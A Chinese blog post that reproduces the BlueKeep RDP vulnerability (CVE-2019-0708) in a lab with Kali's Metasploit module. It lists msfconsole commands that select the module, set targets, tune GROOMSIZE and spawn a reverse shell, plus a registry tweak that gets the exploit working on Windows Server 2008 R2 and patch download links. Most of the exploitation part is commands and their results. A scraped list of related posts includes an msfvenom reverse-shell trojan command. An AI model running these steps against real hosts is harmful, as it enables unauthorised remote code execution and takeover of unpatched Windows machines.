CVE-2019-0708漏洞,kali的msf中模块利用
0x00 漏洞描述
2019年5月14日,微软发布了本月安全更新补丁,其中包含一个RDP(远程桌面服务)远程代码执行漏洞的补丁更新,对应CVE编号:CVE-2019-0708,相关信息链接:
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708
https://blogs.technet.microsoft.com/msrc/2019/05/14/prevent-a-worm-by-updating-remote-desktop-services-cve-2019-0708/
CVE-2019-0708是微软发布的一个严重的RDP远程代码执行漏洞。该漏洞无需身份认证和用户交互,可能形成蠕虫爆发,影响堪比wannycry。
2019年09月07日,@rapid7 在其metasploit-framework仓库公开发布了CVE-2019-0708的利用模块,漏洞利用工具已经开始扩散,已经构成了蠕虫级的攻击威胁
0x01 影响版本
Windows 7Windows Server 2008 R2Windows Server 2008Windows Server 2003Windows XP
0x02 漏洞原理
该漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的。
这个漏洞是今年来说危害严重性最大的漏洞,跟之前的勒索病毒永恒之蓝差不多。
CVE-2019-0708漏洞是通过检查用户的身份认证,导致可以绕过认证,不用任何的交互,直接通过rdp协议进行连接发送恶意代码执行命令到服务器中去。如果被攻击者利用,会导致服务器入侵,中病毒,像WannaCry 永恒之蓝漏洞一样大规模的感染。
2019年9月7日晚上凌晨1点左右,metaspolit更新了漏洞利用程序。
未经身份验证的攻击者利用该漏洞,向目标Windows主机发送恶意构造请求,可以在目标系统上执行任意代码。
0x03 环境搭建与准备
本次复现版本为Windows 7 sp1和Windows Server 2008 R2
Windows 7 sp1:ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/Windows Server 2008 R2:ed2k://|file|cn_windows_server_2008_r2_standard_enterprise_datacenter_and_web_with_sp1_vl_build_x64_dvd_617396.iso|3368962048|7C210CAC37A05F459758BCC1F4478F9E|/
Vmware版本15
msf升级
msf升级很简单,打开终端输入下面两条命令即可
apt-get update
apt-get install metasploit-framework
启动msfconsole
search 0708 搜索0708的位置
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce 使用这个模块
Show options ##查看设置情况
info ##查看基本信息情况可见关键设置主要为RHOSTS、RPORT 、 target
使用set RHOSTS 受害机IP设置受害机IP
使用set RPORT 受害机PORT设置受害机RDP端口号(默认3389)
使用set target ID数字(可选为0-7)设置受害机机器架构
这里我们使用的是VMware 15,那么target 4满足条件
使用exploit或者run开始攻击,等待建立连接。
Show payloads ##查看payload,set payload ... 可进行设置payload
Show advanced ##查看高级选项的参数,
其中groomsize 默认250MB,ForceExploit 默认false 也可以set ForceExploit true 设置为true。Show -h ##查看帮助
Windows 7 sp1的准备工作
Win7--IP地址为:192.168.80.131,内存4g
开启3389端口,并且关闭防火墙,kali与win7之间能相互ping通。
带宽不受限。
0x04 测试
set payload windows/x64/messagebox
这个payload是在靶机上弹出一个窗口。在执行run后,可看到win7靶机上弹出窗口,如下图:
set rhosts 192.168.80.131
set target 3 ####今天target为4 时,无法成功,但是昨天target等于4时还能行,并且我的vmware为15。target参数的设置需要自己多切换不同的参数试试。
run
set payload generic/shell_reverse_tcp 设置payload为generic/shell_reverse_tcp
可以看到在终端中输入ipconfig后,回显192.168.80.131
见解分析
在传送250MB包,网速不受限制的情况下,网速最高达到48MB/s,但是现实中这个不可能达到的情况,现实中顶多也就是10MB/s左右,这个原因是这个漏洞无法利用的重要原因。Rdp协议连接超过30s左右(自己数的,具体协议上怎么规定的没有看)就会被断开。250MB包要在30s左右发出去。那就需要9MB/s左右的网速。但是现实不太可能实现。Metasploit中的这个脚本是rb语言,环境不太通用,缺乏移植性,这也是一个原因。若是把rb语言换成python会好点,但这不是主要原因,主要原因还是rdp协议自动断开的问题。
出错的情况
这种情况下,靶机被打倒蓝屏。
这是与靶机之间ping不通,或者靶机防火墙没有关闭。
进一步测试
接下来调整带宽,与groomsize的大小。再次进行测试。
带宽100Mbps
Set GROOMSIZE 100
最高达到14MiB/s,成功。
带宽45Mbps
Set GROOMSIZE 80
最高达到5.9MiB/s,成功。
带宽在45Mbps情况下,Set GROOMSIZE 40
最高达到5.9MiB/s,成功。
带宽在45Mbps情况下,Set GROOMSIZE 30
最高达到5.9MiB/s,成功。
再次减小GROOMSIZE或带宽的值就不行了。
当然带宽也可以自定义。
Windows Server 2008 R2的准备工作
win server 2008--IP地址为:192.168.80.130,内存2g
开启3389端口,并且关闭防火墙,kali与win server 2008之间能相互ping通。
带宽不受限。
当时测试时候没有成功,老是蓝屏(真是永恒之蓝啊),后来请教了别人说是修改注册表。
Win + R 输入 regedit 进入注册表编辑器,按以下目录找到 fDisableCam 并将值改为0HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\Winstations\RDP-Tcp\fDisableCam = 0
0x05 总结
这篇文章写得还不是很好,有些地方的截图没截取,见解分析那一块也是向大佬学习才熟知的。
win server 2008也没有再去测试,只是知道了要修改注册表的地方,等我测试好了再把图补上。
现在exp不是很稳定,很难在实战中利用,事无绝对,说不定就有大佬牛人已经吃到肉了。2333
tips:若是不成功的话payload与target多尝试几个。总会成功的
参考链接:https://www.cnblogs.com/-mo-/p/11483820.html
0x06 修复方式
下载补丁:
Windows 7 sp1:http://download.windowsupdate.com/d/msdownload/update/software/secu/2019/05/windows6.1-kb4499175-x64_3704acfff45ddf163d8049683d5a3b75e49b58cb.msuWindows Server 2008 R2:http://download.windowsupdate.com/c/msdownload/update/software/secu/2019/05/windows6.1-kb4499175-x64_3704acfff45ddf163d8049683d5a3b75e49b58cb.msu
CVE-2019-0708漏洞,kali的msf中模块利用相关推荐
- 关于利用kali linux2017.2中MSFCONSOLE 利用MS17-010漏洞发起攻击的坑
1.直接使用msfconsole中自带的 "ms17_010_eternalblue"模块 攻击机:192.168.148.134 kali linux2017.2 x64 靶 ...
- 内网渗透之MSF框架模块详细作用介绍
目录 Metasploit Framework MSF主机存活探测类 MSF主机端口扫描类 MSF主机服务探测类 MSF主机反弹shell类 MSF主机服务爆破类 MSF攻击模块利用类 MSF数据库提 ...
- 2023年4月Kali MSF命令模块最详细模块与利用解释整合
前言 注意:前提概要<请遵守您本国家的相关法律法规,如有其他疑问或者任何事情与我本人无关> 开始 首先我们启动命令 msfconsole 我们应该都知道msf有三个大模块 use auxi ...
- kali linux 2019教程,[教程]KALI LINUX 2.0 2019 更新国内源
2019年最新版本KALI 为 KALI 2019.1 下载地址:https://www.kali.org/downloads/ 有的新入门的朋友可能会问,为什么每次都无法手动更新 例如:Update ...
- 永恒之蓝(MS17-010)漏洞复现及msf常用渗透命令
环境部署 靶机:win7(172.168.100.158) 工具机:kali,nessus 攻击步骤 1.nessus扫描靶机 2.根据扫描结果查看靶机漏洞 3.发现靶机存在永恒之蓝(MS17-010 ...
- 【kali】29 提权—— 利用漏洞提权
这里写自定义目录标题 一.使用 Ms011-080 获取 WinXP 的 SYSTEM 权限 1. Ms011-080 对应补丁 Kb2592799 2. kali集成了exploit 3. 查看.p ...
- kali使用msf简单制作木马
命令: 废话不多说,直接上命令: msfvenom -a x86 -p windows/meterpreter/reverse_tcp lhost=192.168.10.166 lport=4444 ...
- MSF中sessions命令使用
Kali中MSF中session相关命令:sessions –h 查看帮助 sessions -i <ID值> #进入会话 -k 杀死会话background #将当前会话放置后台 run ...
- MSF中使用Nessus
使用load nessus在MSF中载入Nessus: msf6 > load nessus 使用nessus_help查看Nessus桥插件支持的所有命令: 使用nessus_connect登 ...
最新文章
- 反序列化出现异常:SerializationException 在分析完成之前就遇到流结尾
- mac 源生安装mysql_docker安装MySQL数据库
- Fitness - 05.23
- mysql 分页 order_Mysql查询使用limit分页,同时使用order by可能产生的问题
- linux wps2016_2016年排名前7的Linux游戏
- layui 图片展示添加一个x_Layx 演示示例
- 【晨读】热爱 ▪ 英语 @ 热爱 ▪ 晨读
- vs2019 + vcpkg安装OpenSSL
- 数据清洗Chap5——数据转换
- 微软 smtp 服务器,配置 SMTP 服务器
- Redis的安装启动,菜鸟使用(windows)
- CASS删除分幅后图框内部十字丝
- vue和echarts实现地图航线
- 高一信息技术认识计算机网络课件,中图版高中信息技术认识计算机网络课件.pptx...
- android mtk 常用修改器,MTK android 可修改IMEI方法
- Linux 多线程同步之哲学家用餐问题分析
- 80x86段寻址的原因
- 3分钟阿里云商标智能注册申请及申请流程图文详解
- bootstrap-tagsinput 使用方法
- 惠普暗影精灵8和惠普暗影精灵7区别
热门文章
- ks8851网卡驱动在omap4460上的移植,发现开发板能发送数据,但是接受不到数据
- 前端工程师必备九大网站
- android 定位
- u盘容量影响计算机运行速度,U盘怎么提高电脑运行速度?电脑提速实用技巧【详解】...
- python制作圣诞贺卡_个性化的圣诞贺卡
- html页面结构代码,pjblog模板结构HTML代码网页展示
- Windows 无法验证此设备所需的驱动程序的数字签名。(错误代码52)
- 爬取了大众点评和去哪儿网上4312家长沙美食,看看什么值得吃?|凹凸数读
- android录音倒计时,android MediaRecorder实现录音功能 显示时间 计时
- 配置管理之二变更管理